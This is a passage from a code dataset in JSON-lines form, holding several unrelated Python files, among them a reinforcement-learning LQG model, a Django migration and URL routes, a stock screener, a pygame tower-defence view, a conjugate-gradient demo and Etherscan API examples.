2*self.gamma*self.B.T.dot(self.P_K).dot(self.B)\n for i in range(xs.shape[0]):\n g_u = 2*self.R.dot(us[i]) + 2*self.gamma*self.B.T.dot(self.P_K).dot(self.A.dot(xs[i])+self.B.dot(us[i])) \n HinvGrad_vecotirzed_K += self.Jacobian_with_vectorized_K(xs[i]).T.dot(np.linalg.lstsq(a = H_u + 1e-3*np.eye(self.dx), b = g_u, rcond=-1)[0])\n return HinvGrad_vecotirzed_K/(batch_size*1)\n\n def empircal_off_policy_natural_gradient(self, xs, kl_threshold):\n batch_size = xs.shape[0]\n off_policy_grad = self.empircal_off_policy_gradient(xs)\n JpJ = np.zeros((self.dx*self.du, self.dx*self.du))\n for i in range(xs.shape[0]):\n J = self.Jacobian_with_vectorized_K(xs[i])\n JpJ += J.T.dot(J)\n JpJ /= batch_size\n \n natural_grad = np.linalg.lstsq(a = JpJ + 1e-3*np.eye(JpJ.shape[0]), b = off_policy_grad, rcond = -1)[0]\n #print np.linalg.norm(off_policy_grad), np.linalg.norm(natural_grad)\n #compute learning_rate too:\n natural_grad_lr = np.sqrt(kl_threshold/(off_policy_grad.dot(natural_grad)+1e-7))\n return natural_grad,natural_grad_lr\n\n def empircal_off_policy_natural_newton(self, xs, kl_threshold):\n batch_size = xs.shape[0]\n off_policy_newton = self.empircal_off_policy_newton_gradient(xs)\n JpJ = np.zeros((self.dx*self.du, self.dx*self.du))\n for i in range(xs.shape[0]):\n J = self.Jacobian_with_vectorized_K(xs[i])\n JpJ += J.T.dot(J)\n JpJ /= batch_size\n \n natural_newton = np.linalg.lstsq(a = JpJ + 1e-3*np.eye(JpJ.shape[0]), b = off_policy_newton, rcond=-1)[0]\n #compute learning_rate too:\n natural_newton_lr = np.sqrt(kl_threshold/(off_policy_newton.dot(natural_newton)+1e-7))\n return natural_newton,natural_newton_lr\n \n def plain_gradient_descent(self, xs, batch_size = 64, lr = None):\n #sample: \n #xs = np.random.multivariate_normal(self.init_state_mean, self.init_state_cov, size = batch_size)\n #approximately compute P_K based on the current K:\n self.Fixed_point_iteration_Raccati_equation(max_iter = 1./(1-self.gamma))\n #compute plain \"DPG\":\n vectorized_grad = self.empircal_off_policy_gradient(xs = xs)\n vectorized_grad = vectorized_grad/np.linalg.norm(vectorized_grad)\n #print np.linalg.norm(vectorized_grad)\n #[U,S] = np.linalg.eig(self.P_K)\n \n vectorized_new_K = self.ADAM_optimizer.update(theta = self.K.reshape(self.du*self.dx), grad = vectorized_grad, alpha = lr)\n #vectorized_new_K = self.Plain_GD.update(theta = self.K.reshape(self.du*self.dx), grad = vectorized_grad, alpha = lr)\n self.K = np.reshape(vectorized_new_K, (self.du, self.dx))\n \n def natural_gradient_descent(self, xs, batch_size = 64, kl_threshold = 0.001):\n #xs = np.random.multivariate_normal(self.init_state_mean, self.init_state_cov, size = batch_size)\n #approximately compute P_K based on the current K:\n self.Fixed_point_iteration_Raccati_equation(max_iter = 1./(1-self.gamma))\n vectorized_nat_grad, nat_grad_lr = self.empircal_off_policy_natural_gradient(xs = xs, kl_threshold = kl_threshold)\n #print np.linalg.norm(vectorized_nat_grad), nat_grad_lr\n vectorized_new_K = self.K.reshape(self.du*self.dx) - nat_grad_lr*vectorized_nat_grad\n self.K = np.reshape(vectorized_new_K, (self.du, self.dx))\n \n def natural_newton_descent(self, xs, batch_size = 64, kl_threshold = 0.001):\n #xs = np.random.multivariate_normal(self.init_state_mean, self.init_state_cov, size = batch_size)\n #approximately compute P_K based on the current K:\n self.Fixed_point_iteration_Raccati_equation(max_iter = 1./(1-self.gamma))\n vectorized_nat_newton, nat_newton_lr = self.empircal_off_policy_natural_newton(xs = xs, kl_threshold = kl_threshold)\n 
vectorized_new_K = self.K.reshape(self.du*self.dx) - nat_newton_lr*vectorized_nat_newton\n        self.K = np.reshape(vectorized_new_K, (self.du, self.dx))\n\n    def exact_evaluate(self):\n        #evaluate the off-policy objective with the current K.\n        #obtain P_K:\n        self.Fixed_point_iteration_Raccati_equation(max_iter = 1./(1-self.gamma))\n        return self.init_state_mean.dot(self.P_K).dot(self.init_state_mean) + np.trace(self.P_K.dot(self.init_state_cov)) #+ np.trace(self.P_K.dot(self.noise_cov))\n\n    def train(self, epoch = 200, batch_size = 64, lr_or_KL = 0.001):\n        epoch_cost = []\n        for e in range(epoch):\n            #evaluate:\n            curr_cost = self.exact_evaluate()\n            print ('at epoch {0}, the current policy has cost {1}'.format(e, curr_cost))\n            epoch_cost.append(curr_cost)\n\n            xs = np.random.multivariate_normal(self.init_state_mean, self.init_state_cov, size = batch_size)\n            if self.method_name == 'Plain GD':\n                self.plain_gradient_descent(xs, batch_size=batch_size, lr = lr_or_KL)\n            elif self.method_name == 'Natural GD':\n                self.natural_gradient_descent(xs = xs, batch_size= batch_size, kl_threshold=lr_or_KL)\n            elif self.method_name == 'Newton Natural GD':\n                self.natural_newton_descent(xs = xs, batch_size=batch_size, kl_threshold=lr_or_KL)\n        \n        return epoch_cost\n\n    def rollout(self, T = 100):\n        x = np.random.multivariate_normal(mean = self.init_state_mean, cov = self.init_state_cov, size = 1)[0]\n        traj_x = []\n        traj_a = []\n        traj_c = []\n        for t in range(T):\n            a = self.K.dot(x)\n            traj_x.append(x)\n            traj_a.append(a)\n            x, c, done = self.step(x = x, u = a)\n            traj_c.append(c)\n        \n        return traj_x, traj_a, traj_c\n    \n    \nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n    parser.add_argument('--seed', help='RNG seed', type=int, default=1337)\n    parser.add_argument('--alg', type=str, default='Natural_GD') \n    args = parser.parse_args()\n    np.random.seed(args.seed)\n    method_name = args.alg.replace(\"_\", \" \") #it also supports Natural GD and Newton Natural GD\n    model = LQG_env(method_name = method_name) \n    epoches_costs = model.train(epoch = 50, batch_size = 64, lr_or_KL=1e-3)\n\n\n    \n    \n\n","sub_path":"baselines/ddpg/LQG_model.py","file_name":"LQG_model.py","file_ext":"py","file_size_in_byte":11156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"528900092","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 22 17:28:25 2018\n\n@author: xavier\n\"\"\"\nimport json\n\n### =========================================================================================\n### ***** Write data to a JSON file *****\n### =========================================================================================\n\n# serialize a structure to a JSON string\ndef to_json(jsonable_structure):\n    return json.dumps(jsonable_structure, ensure_ascii=False, indent=0)\n\n# write a string to the file file_name\ndef json_to_file(jsonable_structure, file_name):\n    with open(file_name, 'w') as f:\n        f.write(to_json(jsonable_structure))\n        f.close()\n\n### =========================================================================================\n### ***** Read data back from a JSON file *****\n### =========================================================================================\n\n# return a Python structure made of lists and dictionaries corresponding to the JSON file\ndef json_to_python(file_name):\n    with open(file_name, 'r') as f:\n        f.seek(0)\n        return json.load(f)\n\n### =========================================================================================\n### ***** Convert non-jsonable objects into jsonable objects and vice versa *****\n### =========================================================================================\n\ndef sets_to_lists_copy(almost_jsonable_structure):\n    if type(almost_jsonable_structure).__name__ == 'set':\n        jsonable_structure=[]\n        for item in almost_jsonable_structure:\n            jsonable_structure.append(sets_to_lists_copy(item))\n    elif type(almost_jsonable_structure).__name__ == 'dict':\n        jsonable_structure = {}\n        for item in almost_jsonable_structure:\n            jsonable_structure[item]=(sets_to_lists_copy(almost_jsonable_structure[item]))\n    else:\n        jsonable_structure = almost_jsonable_structure\n    return jsonable_structure\n\n\ndef lists_to_sets_copy(json_loaded_structure):\n    if type(json_loaded_structure).__name__ == 'list':\n        set_structure=set()\n        for item in json_loaded_structure:\n            if type(item).__name__ in ['list', 'set', 'dict']: # or not in list of immutables, but this should be enough\n                set_structure=[]\n                for item in json_loaded_structure:\n                    set_structure.append(lists_to_sets_copy(item))\n                break\n        else:\n            for item in json_loaded_structure:\n                set_structure.add(lists_to_sets_copy(item))\n    elif type(json_loaded_structure).__name__ == 'dict':\n        set_structure = {}\n        for item in json_loaded_structure:\n            set_structure[item]=(lists_to_sets_copy(json_loaded_structure[item]))\n    else:\n        set_structure = json_loaded_structure\n    return set_structure\n\n","sub_path":"Data Science/Scholar-Affiliation-Recognition-Project/paf-affiliations-machine_learning/JSON_interfacer.py","file_name":"JSON_interfacer.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"363211742","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport e89_push_messaging.mixins\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('accounts', '0008_auto_20150727_1201'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Alert',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('title', models.CharField(max_length=30)),\n                ('content', models.CharField(max_length=100)),\n                ('timestamp', models.DateTimeField(auto_now=True)),\n                ('user_employee', models.ForeignKey(to='accounts.UserEmployee')),\n            ],\n            bases=(models.Model, e89_push_messaging.mixins.PushMixin),\n        ),\n        migrations.CreateModel(\n            name='AlertToDelete',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('alert_id', models.IntegerField()),\n                ('timestamp', models.DateTimeField(auto_now=True)),\n                ('user_employee', models.ForeignKey(to='accounts.UserEmployee')),\n            ],\n            bases=(models.Model, e89_push_messaging.mixins.PushMixin),\n        ),\n    ]\n","sub_path":"alerts/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"638340965","text":"from helpers import *\nfrom yahoo_finance import Share\nimport pprint\n#this is going to be the biggest and most difficult part of the program\n\ndef screen():\n\tlisted_data = SP_500()\n\tprint ('Input Specifications ')\n\tind_bool = input('Industry filtered (y/n): ')\n\tif ind_bool == 'y' or ind_bool == 'yes':\n\t\tlisted_data = 
industry_filter(listed_data)\n\n\t#so they can be bools if not used later\n\tpe_max = False\n\tmax_mc = False\n\tmin_mc = False\n\tcp_val = False\n\n\tpe = input('P/E filter (y/n)*: ')\n\tif (pe == 'y'):\n\t\tpe_max = int(input('Maximum P/E ratio:'))\n\n\txmc = input('Market Cap (max) filter (y/n)*: ')\n\tif (xmc == 'y'):\n\t\tmax_mc = int(input('->Maximum Market Cap ratio:'))\n\n\tn_mc = input('Market Cap (min) filter (y/n)*: ')\n\tif (n_mc == 'y'):\n\t\tmin_mc = int(input('->Minimum Market Cap ratio:'))\n\n\tcp_v = input('Current price filter (y/n)*: ')\n\tif (cp_v == 'y'):\n\t\tcp_val = int(input('->Current Price Window (+-$15):'))\n\n\tif (pe_max or max_mc or min_mc or cp_val):\n\t\tlisted_data = load_filters(listed_data, pe_max, max_mc, min_mc, cp_val)\n\t#one function would be best\n\tprint (listed_data)\n\ndef industry_filter(data):\n\tindustries = []\n\tfor company in data:\n\t\tif len(company) == 3 and company[2] not in industries:\n\t\t\tindustries.append(company[2])\n\tindustries.sort()\n\n\tindustry = input('Industry (ls, quit):')\n\n\twhile industry not in industries:\n\t\tif industry == 'ls':\n\t\t\tprint (industries)\n\t\telif industry == 'quit':\n\t\t\treturn data\n\t\telse:\n\t\t\tprint ('Invalid Industry')\n\t\tindustry = input('Industry (ls, quit):')\n\n\tnew_data = []\n\tfor company in data:\n\t\tif len(company) == 3 and company[2] == industry:\n\t\t\tnew_data.append(company)\n\treturn new_data\n\n\t\ndef load_filters(data, pe_max, max_mc, min_mc, cp_val):\n\tnew_data = []\n\tcount = 0\n\tinv_count = 0\n\tprint ('Running data')\n\tfor company in data:\n\t\trun_bool = True\n\t\ttry:\n\t\t\tcount +=1\n\t\t\tstock = Share(company[0]) #pulls ticker\n\t\t\tif pe_max and run_bool:\n\t\t\t\tratio = stock.get_price_earnings_ratio()\n\t\t\t\tif not type(ratio) is str:\n\t\t\t\t\tinv_count += 1\n\t\t\t\t\trun_bool = False\n\t\t\t\telse:\n\t\t\t\t\trun_bool = float(ratio) <= pe_max\n\t\t\tif max_mc and run_bool:\n\t\t\t\tcap = stock.get_market_cap()\n\t\t\t\tif not type(cap) is str:\n\t\t\t\t\tinv_count += 1\n\t\t\t\t\trun_bool = False\n\t\t\t\telse:\n\t\t\t\t\trun_bool = float(cap) <= max_mc\n\n\t\t\tif min_mc and run_bool:\n\t\t\t\tcap = stock.get_market_cap()\n\t\t\t\tif not type(cap) is str:\n\t\t\t\t\tinv_count += 1\n\t\t\t\t\trun_bool = False\n\t\t\t\telse:\n\t\t\t\t\trun_bool = float(cap) >= min_mc\n\n\t\t\tif cp_val and run_bool:\n\t\t\t\tc_price = stock.get_price()\n\t\t\t\tif not type(c_price) is str:\n\t\t\t\t\tinv_count += 1\n\t\t\t\t\trun_bool = False\n\t\t\t\telse:\n\t\t\t\t\trun_bool = float(c_price) <= cp_val + 15 and float(c_price) >= cp_val - 15\n\n\t\t\tif run_bool:\n\t\t\t\tnew_data.append(company)\n\t\texcept:\n\t\t\tinv_count += 1\n\n\n\n\tprint ('Done Loading!')\n\tprint (inv_count, 'of', count, 'companies filtered out due to no/corrupted data')\n\n\treturn new_data","sub_path":"python 3.5/Screen.py","file_name":"Screen.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"396249571","text":"# Exercise 8 - insert book data into the Books table\r\n\r\nimport pymysql\r\ndb = pymysql.connect('localhost', 'root', 'root123', 'studypython',charset='utf8')\r\ncursor = db.cursor()\r\ndata = [(\"零基础学Python\", \"Python\", \"79.80\", \"2018-5-20\"),\r\n        (\"Python从入门到精通\", \"Python\", \"69.80\", \"2018-6-18\"),\r\n        (\"零基础学PHP\", \"PHP\", \"69.80\", \"2017-5-21\"),\r\n        (\"PHP项目开发实战入门\", \"PHP\", \"79.80\", \"2016-5-21\"),\r\n        (\"零基础学Java\", \"Java\", \"69.80\", \"2017-5-21\")]\r\ntry:\r\n    
cursor.executemany('insert into books(name, category, price, publish_time) values(%s,%s,%s,%s)', data)\r\n db.commit()\r\nexcept:\r\n db.rollback()\r\ndb.close()","sub_path":"008.py","file_name":"008.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"638513201","text":"from zipfile import ZipFile\nimport numpy as np\n\n'''load your data here'''\n\nclass DataLoader(object):\n def __init__(self,batch_size):\n self.DIR = '../data/'\n self.batch_size = batch_size\n \n # Returns images and labels corresponding for training and testing. Default mode is train. \n # For retrieving test data pass mode as 'test' in function call.\n def load_data(self, mode = 'train'):\n label_filename = mode + '_labels'\n image_filename = mode + '_images'\n label_zip = '../data/' + label_filename + '.zip'\n image_zip = '../data/' + image_filename + '.zip'\n with ZipFile(label_zip, 'r') as lblzip:\n labels = np.frombuffer(lblzip.read(label_filename), dtype=np.uint8, offset=8)\n with ZipFile(image_zip, 'r') as imgzip:\n images = np.frombuffer(imgzip.read(image_filename), dtype=np.uint8, offset=16).reshape(len(labels), 784)\n images =images - np.mean(images, axis=1)[:, np.newaxis]\n images= images/255.\n images = np.insert(images, 0, 1, 1)\n return images, labels\n\n def create_batches(self, images_t, labels_t):\n p = np.random.permutation(len(images_t))\n images=images_t[p]\n labels=labels_t[p]\n images=np.reshape(images,(images.shape[0]/self.batch_size,self.batch_size,images.shape[1]))\n labels=np.reshape(labels,(labels.shape[0]/self.batch_size,self.batch_size))\n return images,labels\n'''\ndata = DataLoader()\ndata.create_batches()\n'''","sub_path":"Neural_network_python/code/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"257740332","text":"import pygame\nfrom settings import WAVE,SPRAY,COIN, WIN_WIDTH, WIN_HEIGHT, HP_IMAGE, HP_GRAY_IMAGE, BACKGROUND_IMAGE\nfrom color_settings import *\nclock = pygame.time.Clock() \n\nclass GameView:\n def __init__(self):\n self.win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))\n #self.font = pygame.font.SysFont(\"comicsans\", 30)\n self.font = pygame.font.Font(pygame.font.match_font('arial'), 25)\n self.coin_count = 0\n self.spray_count = 0\n \n def draw_bg(self):\n self.win.blit(BACKGROUND_IMAGE, (0, 0))\n\n def draw_enemies(self, enemies):\n for en in enemies.get():\n self.win.blit(en.image, en.rect)\n # draw health bar\n bar_width = en.rect.w * (en.health / en.max_health)\n max_bar_width = en.rect.w\n bar_height = 5\n pygame.draw.rect(self.win, RED, [en.rect.x, en.rect.y - 10, max_bar_width, bar_height])\n pygame.draw.rect(self.win, GREEN, [en.rect.x, en.rect.y - 10, bar_width, bar_height])\n \n def draw_fire_balls(self, fire_ball):\n for fire in fire_ball.get():\n self.win.blit(fire.image, fire.rect)\n \n def draw_towers(self, towers):\n # draw tower\n for tw in towers:\n if tw :\n self.win.blit(SPRAY[self.spray_count % 3], tw.rect)\n self.spray_count += 1\n self.win.blit(tw.image, tw.rect)\n\n def draw_range(self, selected_tower):\n # draw tower range\n if selected_tower is not None:\n tw = selected_tower\n # create a special surface that is able to render semi-transparent image\n surface = pygame.Surface((WIN_WIDTH, WIN_HEIGHT), pygame.SRCALPHA)\n transparency = 120\n pygame.draw.circle(surface, (128, 128, 128, transparency), 
tw.rect.center, tw.range)\n self.win.blit(surface, (0, 0))\n\n def draw_menu(self, menu):\n self.win.blit(menu.image, menu.rect)\n for btn in menu.buttons:\n self.win.blit(btn.image, btn.rect)\n\n def draw_plots(self, plots):\n for pt in plots:\n self.win.blit(pt.image, pt.rect)\n\n def draw_money(self, money: int):\n \"\"\" (Q2.1)render the money\"\"\"\n text = self.font.render(f\" : {money}\", True, (255, 255, 255))\n self.win.blit(text, (5, 45))\n self.win.blit(COIN[self.coin_count % 2], (3, 40))\n if (1000-money) % 2 != 0:\n self.coin_count += 1\n self.win.blit(COIN[self.coin_count % 2], (3, 40))\n\n def draw_wave(self, wave: int):\n \"\"\"(Q2.2)render the wave\"\"\"\n text = self.font.render(f\" : {wave}\", True, (255, 255, 255))\n self.win.blit(WAVE, (3, 10))\n self.win.blit(text, (5, 15))\n\n def draw_hp(self, lives):\n # draw_lives\n hp_rect = HP_IMAGE.get_rect()\n for i in range(10):\n self.win.blit(HP_GRAY_IMAGE, (WIN_WIDTH // 2 - hp_rect.w * (2.5 - i % 5), hp_rect.h * (i // 5)))\n for i in range(lives):\n self.win.blit(HP_IMAGE, (WIN_WIDTH // 2 - hp_rect.w * (2.5 - i % 5), hp_rect.h * (i // 5)))\n \n def draw_end(self, model):\n# largeText = pygame.font.SysFont(\"comicsansms\",115)\n# TextSurf = largeText.render('You dead', True, (255,0,0))\n# self.win.blit(TextSurf, (WIN_WIDTH // 3 -50 , WIN_HEIGHT // 3))\n end = True\n pygame.init()\n pygame.font.init()\n while end and model.events[\"game quit\"] == False: \n end = True\n largeText = pygame.font.Font(pygame.font.match_font('arial'), 115)\n #largeText = pygame.font.SysFont(\"comicsansms\",115)\n TextSurf = largeText.render('Game over', True, (255,255,255))\n self.win.blit(TextSurf, (WIN_WIDTH // 3 - 50 , WIN_HEIGHT // 3))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n model.events[\"game quit\"] = True\n end = False\n break\n elif event.type == pygame.KEYDOWN :\n if event.key == pygame.K_r: # Unpausing\n end = False\n break\n pygame.display.update()\n \n def draw_count_down(self,wait):\n #font= pygame.font.SysFont(\"comicsansms\",100)\n font = pygame.font.Font(pygame.font.match_font('arial'), 100)\n count_down_text = font.render(str(wait), True, (255,255,255))\n count_down_rect = count_down_text.get_rect()\n surface = pygame.Surface((WIN_WIDTH, WIN_HEIGHT), pygame.SRCALPHA)\n transparency = 100\n pygame.draw.circle(surface, (128, 128, 128, transparency), (512,300),150)\n self.win.blit(surface, (0, 0))\n count_down_rect.center = (512,300)\n self.win.blit(count_down_text, count_down_rect)\n \n def draw_win(self, model):\n# largeText = pygame.font.SysFont(\"comicsansms\",115)\n# TextSurf = largeText.render('You dead', True, (255,0,0))\n# self.win.blit(TextSurf, (WIN_WIDTH // 3 -50 , WIN_HEIGHT // 3))\n win = True\n pygame.init()\n pygame.font.init()\n while win:\n win = True\n #largeText = pygame.font.SysFont(\"comicsansms\",115)\n largeText = pygame.font.Font(pygame.font.match_font('arial'), 115)\n TextSurf = largeText.render('You win', True, (255,255,255))\n self.win.blit(TextSurf, (WIN_WIDTH // 3 - 50 , WIN_HEIGHT // 3))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n model.events[\"game quit\"] = True\n win = False\n break\n elif event.type == pygame.KEYDOWN :\n if event.key == pygame.K_r: # Unpausing\n win = False\n break\n pygame.display.update()\n","sub_path":"The Last Pure Land_version.03/game/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 
+{"seq_id":"528947617","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 6 14:22:56 2014\n\n@author: maire\n\"\"\"\ndef has_duplicates(list): \n for i in list:\n for k in range(i+1,len(list)):\n if list[i]==list[k]:\n return True\n return False \n","sub_path":"SoftwareDesignExplore/Day5.py","file_name":"Day5.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"255986547","text":"from django.conf.urls import url\nfrom .views import home, account\n\n\nurlpatterns = [\n url(r'^login.html', account.login),\n url(r'^logout.html', account.logout),\n url(r'^register.html', account.register),\n url(r'^updown.html', account.updown),\n url(r'^check_code.html$', account.check_code),\n url(r'^receive_content.html$', account.receive_content),\n url(r'^all/(?P\\d+).html$', home.index, name='index'),\n url(r'^(?P\\w+)/(?P((tag)|(category)|(date)))/(?P\\w+-?\\w*).html$', home.allocation), # filter\n url(r'^(?P\\w+)/(?P\\d+).html$', home.detail),\n url(r'^(?P\\w+).html$', home.home),\n url(r'^', home.index),\n]\n","sub_path":"SelfLearn/框架(Django)/181115_報障系統/reportingsystem/web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"486256071","text":"#!/usr/bin/env python3\n# http://ikuz.eu/2015/04/15/the-concept-of-conjugate-gradient-descent-in-python/\n\nimport itertools\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef main():\n A = np.matrix([[3.0, 2.0], [2.0, 6.0]])\n b = np.matrix([[2.0], [-8.0]]) # we will use the convention that a vector is a column vector\n c = 0.0\n\n x1, x2, zs = bowl(A, b, c)\n contoursteps(x1, x2, zs)\n\n # steps = steepest_descent(A, b)\n # contoursteps(x1, x2, zs, steps)\n\n # steps = steepest_descent_with_fixed_learning_rate(A, b, alpha=0.12)\n # contoursteps(x1, x2, zs, steps)\n\n steps = conjugate_gradient(A, b)\n contoursteps(x1, x2, zs, steps)\n\ndef fn(x, A, b, c):\n return float(0.5 * x.T * A * x - b.T * x + c)\n\ndef bowl(A, b, c):\n fig = plt.figure(figsize=(10,8))\n qf = fig.gca(projection='3d')\n size = 20\n x1 = list(np.linspace(-6, 6, size))\n x2 = list(np.linspace(-6, 6, size))\n x1, x2 = np.meshgrid(x1, x2)\n zs = np.zeros((size, size))\n for i in range(size):\n for j in range(size):\n x = np.matrix([[x1[i,j]], [x2[i,j]]])\n zs[i,j] = fn(x, A, b, c)\n qf.plot_surface(x1, x2, zs, rstride=1, cstride=1, cmap=cm.coolwarm, linewidth=0)\n\n plt.savefig('./plot/bowl.png',dpi=300,format='png',bbox_inches='tight');\n plt.close(fig)\n\n return x1, x2, zs\n\ndef contoursteps(x1, x2, zs, steps=None):\n fig = plt.figure(figsize=(6,6))\n cp = plt.contour(x1, x2, zs, 10)\n plt.clabel(cp, inline=1, fontsize=10)\n if steps is not None:\n steps = np.matrix(steps)\n plt.plot(steps[:,0], steps[:,1], '-o')\n plt.savefig('./plot/contour.png',dpi=300,format='png',bbox_inches='tight');\n plt.close(fig)\n\ndef steepest_descent_with_fixed_learning_rate(A, b, alpha):# aka gradient descent\n x = np.matrix([[-2.0],[-2.0]])\n steps = [(-2.0, -2.0)]\n i = 0\n imax = 10000\n eps = 0.01\n\n r = b - A * x\n delta = r.T * r\n delta0 = delta\n\n while i < imax and delta > eps**2 * delta0:\n x = x + alpha * r\n steps.append((x[0,0], x[1,0])) # store steps for future drawing\n\n r = b - A * x\n delta = r.T * r\n\n i += 1\n\n return steps\n\ndef steepest_descent(A, b):\n # init\n x = 
np.matrix([[-2.0],[-2.0]])\n steps = [(-2.0, -2.0)]\n i = 0\n imax = 10\n eps = 0.01\n\n r = b - A * x # residual, ie the direction of steepest descent.\n delta = r.T * r\n delta0 = delta\n\n while i < imax and delta > eps**2 * delta0:\n alpha = float(delta / (r.T * (A * r))) # how far along that direction we need to go?.\n\n x = x + alpha * r\n steps.append((x[0,0], x[1,0])) # store steps for future drawing\n\n r = b - A * x # repeat finding the direction\n delta = r.T * r\n\n i += 1\n\n return steps\n\ndef conjugate_gradient(A, b):\n x = np.matrix([[-2.0],[-2.0]])\n steps = [(-2.0, -2.0)]\n i = 0\n imax = 10\n eps = 0.01\n\n r = b - A * x # r: residual\n d = r # d: conjugate vectors, which we call directions.\n delta = r.T * r\n delta0 = delta\n\n while i < imax and delta > eps**2 * delta0:\n alpha = float(delta / float(d.T * (A * d)))\n\n x = x + alpha * d\n steps.append((x[0, 0], x[1, 0]))\n\n r = b - A * x\n\n deltaold = delta\n delta = r.T * r\n\n # \\beta steered us to the conjugate direction.\n # beta = -float((r.T * A * d) / float(d.T * A * d))\n beta = float(delta / float(deltaold)) # simplified version\n\n d = r + beta * d\n\n i += 1\n\n return steps\n\nif __name__ == '__main__':\n main()\n","sub_path":"optim/script/cg_ilya_kuzovkin.py","file_name":"cg_ilya_kuzovkin.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"443901092","text":"from etherscan.accounts import Account\nfrom etherscan.blocks import Blocks\nfrom etherscan.contracts import Contract\nfrom etherscan.proxies import Proxies\nfrom etherscan.stats import Stats\nfrom etherscan.tokens import Tokens\nfrom etherscan.transactions import Transactions\nimport os\nimport json\n\n# Get API Key\npath = os.getcwd()\nwith open(os.path.join(path, 'api_key.json'), mode='r') as key_file:\n key = json.loads(key_file.read())['key']\n\n# Accounts\n\naddress = '0x742d35Cc6634C0532925a3b844Bc454e4438f44e'\napi = Account(address=address, api_key=key)\n\nbalance = api.get_balance()\ntransaction = api.get_transaction_page(\n page=1, offset=10000, sort='des') # erc20 = True)\ntransactions = api.get_all_transactions(\n offset=10000, sort='asc', internal=False)\nblock = api.get_blocks_mined_page(page=1, offset=1, blocktype='blocks')\nblocks = api.get_all_blocks_mined(offset=10, blocktype='uncles')\n\n# address = ['0xddbd2b932c763ba5b1b7ae3b362eac3e8d40121a',\n# '0xddbd2b932c763ba5b1b7ae3b362eac3e8d40121a']\n#\n#api = Account(address=address, api_key=key)\n#balances = api.get_balance_multiple()\n# print(balances)\n\n# Blocks\n\napi = Blocks(api_key=key)\n\nreward = api.get_block_reward(2165403)\n\n# Contracts\n\naddress = '0xfb6916095ca1df60bb79ce92ce3ea74c37c5d359'\napi = Contract(address=address, api_key=key)\n\nabi = api.get_abi()\nsourcecode = api.get_sourcecode()\n\n# Proxies\n\nnumber = 10453272\nblock_numb = '0x9f8118'\naddress = '0xf75e354c5edc8efed9b59ee9f67a80845ade7d0c'\nTX_HASH = '0xb03d4625fd433ad05f036abdc895a1837a7d838ed39f970db69e7d832e41205d'\nindex = '0x0'\napi = Proxies(api_key=key)\n\nprice = api.gas_price()\nblock = api.get_block_by_number(number)\ntx_count = api.get_block_transaction_count_by_number(block_number=block_numb)\ncode = api.get_code(address)\nblock0 = api.get_most_recent_block()\nvalue = api.get_storage_at(address, 0x0)\ntransaction = api.get_transaction_by_blocknumber_index(block_number=block_numb,\n index=index)\ntransaction = api.get_transaction_by_hash(tx_hash=TX_HASH)\ncount = 
api.get_transaction_count(address)\nreceipt = api.get_transaction_receipt(TX_HASH)\nuncles = api.get_uncle_by_blocknumber_index(block_number=block_numb,\n index=index)\n\n# Stats\n\napi = Stats(api_key=key)\n\nlast_price = api.get_ether_last_price()\nsupply = api.get_total_ether_supply()\n\n# Tokens\n\naddress = '0xe04f27eb70e025b78871a2ad7eabe85e61212761'\ncontract_address = '0x57d90b64a1a57749b0f932f1a3395792e12e7055'\napi = Tokens(contract_address=contract_address,\n api_key=key)\n\nbalance = api.get_token_balance(address=address)\nsupply = api.get_total_supply()\n\n# Transactions\n\nTX_HASH = '0x15f8e5ea1079d9a0bb04a4c58ae5fe7654b5b2b4463375ff7ffb490aa0032f3a'\napi = Transactions(api_key=key)\n\nstatus = api.get_status(tx_hash=TX_HASH)\nreceipt_status = api.get_tx_receipt_status(tx_hash=TX_HASH)\n","sub_path":"section1/task3/Etherscan.py","file_name":"Etherscan.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"594445032","text":"from selenium import webdriver\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.staticfiles.testing import LiveServerTestCase\nfrom django.utils import timezone\nimport time, datetime\nfrom .base import FunctionalTest, LoginFunctionalTest\nfrom unittest import skip\n\n# 